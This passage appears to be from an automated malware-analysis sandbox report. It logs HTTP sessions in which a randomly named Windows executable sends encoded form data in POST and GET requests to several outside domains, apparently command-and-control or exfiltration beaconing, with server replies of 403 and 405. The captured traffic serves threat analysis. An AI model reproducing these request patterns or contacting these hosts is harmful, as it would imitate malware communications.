                                                                                                                                                    Data Raw: 50 62 47 3d 77 73 6b 5a 59 4a 30 59 53 54 70 52 63 4d 37 6d 45 4e 39 43 36 62 38 31 7a 75 56 6c 78 4b 65 46 32 72 38 74 73 6c 57 51 68 4f 4c 61 74 43 41 73 6b 61 4a 34 6f 67 6a 64 67 53 36 46 66 6d 63 4c 38 38 47 44 37 46 70 4b 7a 52 55 79 34 49 2b 70 61 74 42 73 4b 49 63 48 45 4c 79 7a 72 7a 43 77 78 72 61 36 45 50 64 36 34 42 77 33 76 6b 4a 77 66 4e 62 59 43 4e 73 42 41 66 6e 73 4f 4f 37 6d 51 31 6f 74 34 48 31 62 67 47 6e 76 7a 43 68 41 4f 56 58 65 4e 68 67 6c 70 73 47 38 6d 42 41 46 2f 53 4a 74 33 65 59 30 54 58 48 4b 48 6a 38 78 6b 63 59 35 4b 64 7a 59 4c 67 61 6a 78 49 68 66 48 33 4c 64 35 6c 63 65 34 72 71 46 42 62 36 30 2b 78 69 41 2f 63 2f 66 5a 4c 7a 62 64 38 59 63 49 71 71 46 6a 36 4a 71 50 31 68 52 36 6f 63 53 55 6a 5a 30 2b 50 34 4c 6d 79 49 69 32 56 6f 45 32 43 42 35 76 54 61 4a 58 51 64 66 34 4a 50 53 30 77 58 50 34 51 34 51 72 41 50 4d 62 43 42 77 55 77 6f 58 6c 68 51 66 58 36 4c 73 75 38 4a 4f 45 4b 35 33 47 64 4d 6e 4b 4d 45 63 78 63 6e 77 7a 5a 66 68 33 43 35 6f 6a 43 7a 4c 48 76 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=wskZYJ0YSTpRcM7mEN9C6b81zuVlxKeF2r8tslWQhOLatCAskaJ4ogjdgS6FfmcL88GD7FpKzRUy4I+patBsKIcHELyzrzCwxra6EPd64Bw3vkJwfNbYCNsBAfnsOO7mQ1ot4H1bgGnvzChAOVXeNhglpsG8mBAF/SJt3eY0TXHKHj8xkcY5KdzYLgajxIhfH3Ld5lce4rqFBb60+xiA/c/fZLzbd8YcIqqFj6JqP1hR6ocSUjZ0+P4LmyIi2VoE2CB5vTaJXQdf4JPS0wXP4Q4QrAPMbCBwUwoXlhQfX6Lsu8JOEK53GdMnKMEcxcnwzZfh3C5ojCzLHvXI22VCpIfPZYuTo3Zf/uwJ7KWcl7dkbpekKq8TE2d2Xk4G9RqRZv1b+pLg8LcJsQpLxFvCTAohNOwgrgYSKtQ6CEsbZMAwFN/ekkPH7egn8ji9ds7A3/7CbEXiPsmYxOVbknlnkDUOY9Y1nj8ISFKkBDXVE6n9WxcAT/Rla9VpuMtUxUzzHvamRxHIKCrl2P7BgEEc8m81gsJ6iJaRH1K4WKH3mRpd1H1CS7X0YZCjw5grkixDdQNsyl9/ZUJjo7Z02R6AxoP+hwHYSRKpqyhr3q1pfb0z1Pk1RS9Sc+lZJrIa12TU7Ab3Rr/rZCvi9A85EVQO2RL/kCrv0AwoS5g8Wh/ZJQ6TuqWujhTtjeVkF9O31JF/3tUktYQ4BsVqaW0IXZSteTDoSHvT0IoLklLcCiZpVRPciKq4uxoMVSapKh+HbnvcWDJneqzFd7uZom6g7bimxuFWnZuRcZhUL3E9HZwwCkC2bO3+PSg0sjKVZT+sTcrE4VBv8uK+Gk5eqimYonSs4HLVLKKwf0m8GoFRbYkLrsrYs2X3CsBZnv7h97hH2Zxdz8McOIJM86Ac4wwZP37B3TIPkZnNi1/4PVxPgBzqd8tZZg5JAhZxVyPzf1asLoPEgwXOM3kv/KzBjOo5SdM65w75SAwCnTxVqk/BH963/rtKgfPR [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:01:13.775151968 CEST4337OUTData Raw: 36 2b 62 77 55 6e 70 6f 4d 71 4e 31 6a 34 6b 65 67 6b 35 72 74 32 6a 47 59 62 63 36 4f 61 4d 6c 2b 77 39 57 54 67 55 42 6b 30 58 30 35 56 52 5a 4e 6e 48 32 41 4f 66 59 66 70 66 32 61 47 76 37 36 4b 57 35 53 79 57 62 49 50 76 6c 32 61 61 34 68 72
                                                                                                                                                    Data Ascii: 6+bwUnpoMqN1j4kegk5rt2jGYbc6OaMl+w9WTgUBk0X05VRZNnH2AOfYfpf2aGv76KW5SyWbIPvl2aa4hrnaPfJkZqGvsWIJGvEY1JbPj4jomXdhLwiN0Uw+Hmuuq7f5Eg3AaJKy1R6b746gKY+6dqk2wfd9F9knwTB5XNBK1WyiEEedtpD7Zq56mMqs94CGslCHy04h9PR+4LlNdK7TOwmFls0XzFRUvcoMQOZ0CA8QQG/SWWc
                                                                                                                                                    Oct 4, 2024 12:01:13.957463026 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    44192.168.11.204977691.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:16.477073908 CEST428OUTGET /w8xy/?PbG=9uM5b9ZGQ2xGa/fVJtRXtYM44dIY5ZCO55UnrVzGgcPFgg1e058W5kaq/wWnc0Jau7/b/2o64CBh5aGCaOFYcZtnKviijE7Q36m7HNpI4xddvmt+atSlTsw=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.gipsytroya.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:01:16.658973932 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    45192.168.11.204977791.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:30.005768061 CEST681OUTPOST /71zx/ HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.eagleup.org
                                                                                                                                                    Referer: http://www.eagleup.org/71zx/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 4e 43 35 79 63 6c 79 6e 73 51 61 53 73 77 4d 31 48 47 45 74 66 72 57 64 43 2b 6f 5a 39 2b 36 4d 37 58 30 70 4a 71 55 6b 62 6d 71 6b 32 53 72 47 77 51 43 44 46 4b 79 44 66 77 35 30 32 5a 68 36 6d 52 31 2f 47 47 59 52 41 49 64 2f 55 61 61 6b 71 4a 55 76 49 53 4b 51 4d 79 70 52 47 2f 2f 6d 48 38 2f 6c 77 58 6f 54 38 73 2b 6b 74 48 78 2b 49 4f 44 67 72 4d 72 50 37 36 76 75 61 68 54 4a 36 41 30 61 66 2f 6c 32 45 4f 57 5a 48 32 74 5a 6d 5a 4d 6b 56 36 35 53 6c 52 4a 53 77 70 62 4f 42 4a 54 64 55 57 57 6e 4d 48 38 36 4b 38 42 65 4d 61 42 52 61 6b 33 5a 71 76 63 52 43 46 42 42 4c 41 3d 3d
                                                                                                                                                    Data Ascii: PbG=NC5yclynsQaSswM1HGEtfrWdC+oZ9+6M7X0pJqUkbmqk2SrGwQCDFKyDfw502Zh6mR1/GGYRAId/UaakqJUvISKQMypRG//mH8/lwXoT8s+ktHx+IODgrMrP76vuahTJ6A0af/l2EOWZH2tZmZMkV65SlRJSwpbOBJTdUWWnMH86K8BeMaBRak3ZqvcRCFBBLA==
                                                                                                                                                    Oct 4, 2024 12:01:30.187117100 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    46192.168.11.204977891.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:32.708153009 CEST701OUTPOST /71zx/ HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.eagleup.org
                                                                                                                                                    Referer: http://www.eagleup.org/71zx/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 4e 43 35 79 63 6c 79 6e 73 51 61 53 2b 6a 45 31 55 56 38 74 4f 37 57 53 48 2b 6f 5a 32 65 37 46 37 58 34 70 4a 72 52 6a 61 56 4f 6b 7a 47 76 47 69 42 43 44 41 4b 79 44 55 51 35 4c 34 35 68 68 6d 52 4a 52 47 43 63 52 41 4a 39 2f 55 59 43 6b 72 36 38 67 48 69 4b 53 48 53 70 66 62 50 2f 6d 48 38 2f 6c 77 58 39 47 38 73 6d 6b 71 33 42 2b 4a 73 6e 6e 6c 73 72 4d 72 4b 76 75 4e 78 54 56 36 41 30 73 66 39 52 4d 45 4d 75 5a 48 33 64 5a 6c 49 4d 6a 63 36 35 51 71 78 49 39 37 5a 71 55 4a 64 62 58 61 42 75 41 4e 57 6f 67 50 71 51 45 52 6f 31 31 5a 33 72 72 75 66 6c 35 41 48 41 61 57 4b 70 5a 55 43 4b 61 33 55 6d 47 33 50 6a 39 52 42 74 6d 50 66 51 3d
                                                                                                                                                    Data Ascii: PbG=NC5yclynsQaS+jE1UV8tO7WSH+oZ2e7F7X4pJrRjaVOkzGvGiBCDAKyDUQ5L45hhmRJRGCcRAJ9/UYCkr68gHiKSHSpfbP/mH8/lwX9G8smkq3B+JsnnlsrMrKvuNxTV6A0sf9RMEMuZH3dZlIMjc65QqxI97ZqUJdbXaBuANWogPqQERo11Z3rrufl5AHAaWKpZUCKa3UmG3Pj9RBtmPfQ=
                                                                                                                                                    Oct 4, 2024 12:01:32.889719963 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    47192.168.11.204977991.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:35.410921097 CEST1289OUTPOST /71zx/ HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.eagleup.org
                                                                                                                                                    Referer: http://www.eagleup.org/71zx/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 4e 43 35 79 63 6c 79 6e 73 51 61 53 2b 6a 45 31 55 56 38 74 4f 37 57 53 48 2b 6f 5a 32 65 37 46 37 58 34 70 4a 72 52 6a 61 56 47 6b 7a 56 33 47 77 79 61 44 44 4b 79 44 64 77 35 77 34 35 67 37 6d 52 68 64 47 48 46 6b 41 4e 4e 2f 4f 39 65 6b 69 72 38 67 51 53 4b 53 49 79 70 53 47 2f 2b 69 48 38 76 68 77 58 74 47 38 73 6d 6b 71 31 5a 2b 66 4f 44 6e 6f 4d 72 50 37 36 76 71 61 68 54 78 36 44 45 38 66 39 55 78 46 39 4f 5a 48 58 4e 5a 32 4b 55 6a 45 71 35 65 72 78 49 6c 37 5a 6e 4b 4a 64 76 68 61 42 79 2b 4e 58 77 67 4f 63 70 73 43 4b 39 7a 4e 57 44 49 75 63 5a 74 43 30 51 75 52 6f 5a 52 54 45 48 36 35 79 69 75 75 65 50 54 57 79 45 74 52 72 6d 6b 4f 52 68 39 56 41 56 51 4b 4b 2f 46 53 6c 62 32 61 45 34 57 64 77 72 33 48 50 2b 76 35 49 45 31 6a 42 44 36 58 62 58 4f 65 6e 4d 63 78 47 31 68 4d 48 41 47 41 4c 45 66 6f 49 47 55 38 45 34 4b 31 61 7a 42 66 68 50 4b 59 51 50 68 36 4d 6b 44 7a 4e 67 4f 72 39 37 63 2f 62 64 4f 59 78 45 6e 31 43 4e 6e 30 76 57 2b 78 69 72 59 38 4c 78 4c 4c 2f 79 30 6b 6b [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=NC5yclynsQaS+jE1UV8tO7WSH+oZ2e7F7X4pJrRjaVGkzV3GwyaDDKyDdw5w45g7mRhdGHFkANN/O9ekir8gQSKSIypSG/+iH8vhwXtG8smkq1Z+fODnoMrP76vqahTx6DE8f9UxF9OZHXNZ2KUjEq5erxIl7ZnKJdvhaBy+NXwgOcpsCK9zNWDIucZtC0QuRoZRTEH65yiuuePTWyEtRrmkORh9VAVQKK/FSlb2aE4Wdwr3HP+v5IE1jBD6XbXOenMcxG1hMHAGALEfoIGU8E4K1azBfhPKYQPh6MkDzNgOr97c/bdOYxEn1CNn0vW+xirY8LxLL/y0kkmj82RXPriMS7mdxwW8XZ2GF99ucA13oR3xDZJKai6gIFl2qBdamnn0T+VEBMA85T/fr912i+EoLFUMAjYnSZ18gtfNSeFMI5nzmFA8xMKs06JIc58FMY0PbkYU42G+0D1JPgPTexJUjQwFuUj+dv/2GIedX9sf7w3VTtApGqUSr1C5ClCQG4jG394PqcAxooFik9gIydEPb2PbCcWbbAJcBCXivR38wkoN4zZiTiCY63e/rIQv8gssjmNncvH3EISVQajfXH3ryfBOhCzRw7cOGBt+qH2kF7a9BXPUn/2A6DKIrrRC0YnnTYxLRTeUlyfQsVVnwYdqhosJOZAPBJtFLzwZLXvI3y8It7ZYl00/OoFE/GzjikpOwotR9CtMc/vuVsKFfBfVcBorniQPyisGG6VbCBY4rmxPj7l/y/SEFbyjqzPm8gmKAoq/rT3Jv/C5KhP9FC8MnlbqZoKXthQ
                                                                                                                                                    Oct 4, 2024 12:01:35.410973072 CEST5617OUTData Raw: 72 58 48 69 6f 31 5a 79 59 6c 33 41 37 6b 50 54 57 4d 37 5a 53 46 36 67 73 49 76 35 4a 70 46 79 2b 51 37 31 39 63 46 38 67 6e 4a 46 44 53 33 59 63 2b 30 4b 43 2b 4f 56 32 64 4c 58 59 75 36 7a 75 58 59 4a 47 4b 70 32 50 31 4a 6e 45 62 75 4d 47 47
                                                                                                                                                    Data Ascii: rXHio1ZyYl3A7kPTWM7ZSF6gsIv5JpFy+Q719cF8gnJFDS3Yc+0KC+OV2dLXYu6zuXYJGKp2P1JnEbuMGGZMfDzopXCUfwG+WebwxLHrfJQJ6Ai/cStJfTF7H26fTjzBZN+UCTqjvPYO+J6Q4QC1iwgSPosVHcKEFohTpZaQeB+zxzilWpp496hnWr6h41T9K/X7DPIAbL7q9zWs3cK7Zw3G205fMHcZ37BQBHgI9NLc3x/31Ye
                                                                                                                                                    Oct 4, 2024 12:01:35.592995882 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    48192.168.11.204978091.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:38.113126040 CEST425OUTGET /71zx/?PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:01:38.294991970 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    49192.168.11.2049781185.134.245.113801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:43.498101950 CEST708OUTPOST /nx20/ HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.strategyvanguard.com
                                                                                                                                                    Referer: http://www.strategyvanguard.com/nx20/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 78 74 30 44 6f 49 62 49 74 72 54 4e 37 52 49 78 2f 69 36 45 76 33 35 74 53 64 39 53 73 57 57 4f 44 59 6d 6e 64 6f 56 74 4b 72 2b 34 50 59 6d 72 41 70 65 4e 64 65 71 7a 65 63 73 73 54 46 4f 45 65 61 66 66 55 34 31 43 4c 7a 41 31 30 41 2b 4c 6d 53 4f 44 57 52 55 48 4b 51 2b 44 62 72 43 64 4a 70 4e 55 68 45 50 57 6e 59 5a 73 64 63 62 33 76 52 31 4b 37 2f 57 74 35 61 5a 37 4c 66 56 4b 6a 35 30 5a 33 65 48 79 2b 37 44 54 70 55 70 56 73 5a 59 42 64 6f 48 4d 72 65 4c 36 6f 46 48 74 44 44 34 55 48 4c 45 63 31 73 74 6e 50 35 75 66 38 59 58 50 77 62 61 57 41 4b 73 38 58 2f 44 2f 39 51 3d 3d
                                                                                                                                                    Data Ascii: PbG=xt0DoIbItrTN7RIx/i6Ev35tSd9SsWWODYmndoVtKr+4PYmrApeNdeqzecssTFOEeaffU41CLzA10A+LmSODWRUHKQ+DbrCdJpNUhEPWnYZsdcb3vR1K7/Wt5aZ7LfVKj50Z3eHy+7DTpUpVsZYBdoHMreL6oFHtDD4UHLEc1stnP5uf8YXPwbaWAKs8X/D/9Q==
                                                                                                                                                    Oct 4, 2024 12:01:43.690882921 CEST313INHTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:01:43 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    50192.168.11.2049782185.134.245.113801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:46.215877056 CEST728OUTPOST /nx20/ HTTP/1.1
                                                                                                                                                    Host: www.strategyvanguard.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.strategyvanguard.com
                                                                                                                                                    Referer: http://www.strategyvanguard.com/nx20/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 78 74 30 44 6f 49 62 49 74 72 54 4e 36 79 41 78 35 42 69 45 6f 58 35 69 5a 39 39 53 31 47 57 4b 44 59 61 6e 64 70 68 48 4e 5a 61 34 4d 38 75 72 44 74 71 4e 65 65 71 7a 47 4d 73 74 51 31 50 49 65 61 43 38 55 35 4a 43 4c 33 6f 31 30 46 61 4c 6e 6c 36 41 58 42 55 4a 43 77 2b 42 47 37 43 64 4a 70 4e 55 68 45 62 77 6e 59 42 73 65 76 54 33 70 77 31 4a 6e 50 57 75 74 4b 5a 37 50 66 55 44 6a 35 30 77 33 66 62 4c 2b 35 37 54 70 56 5a 56 72 4c 77 43 45 59 48 77 6c 2b 4b 70 35 45 2b 64 61 44 41 64 47 4d 38 51 33 5a 6c 4f 4b 76 2f 46 68 71 6a 72 7a 49 47 6b 45 36 56 55 56 39 43 6b 67 63 73 4d 4a 78 74 67 45 49 77 59 78 44 37 49 78 55 51 69 2b 56 41 3d
                                                                                                                                                    Data Ascii: PbG=xt0DoIbItrTN6yAx5BiEoX5iZ99S1GWKDYandphHNZa4M8urDtqNeeqzGMstQ1PIeaC8U5JCL3o10FaLnl6AXBUJCw+BG7CdJpNUhEbwnYBsevT3pw1JnPWutKZ7PfUDj50w3fbL+57TpVZVrLwCEYHwl+Kp5E+daDAdGM8Q3ZlOKv/FhqjrzIGkE6VUV9CkgcsMJxtgEIwYxD7IxUQi+VA=
                                                                                                                                                    Oct 4, 2024 12:01:46.408291101 CEST313INHTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:01:46 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
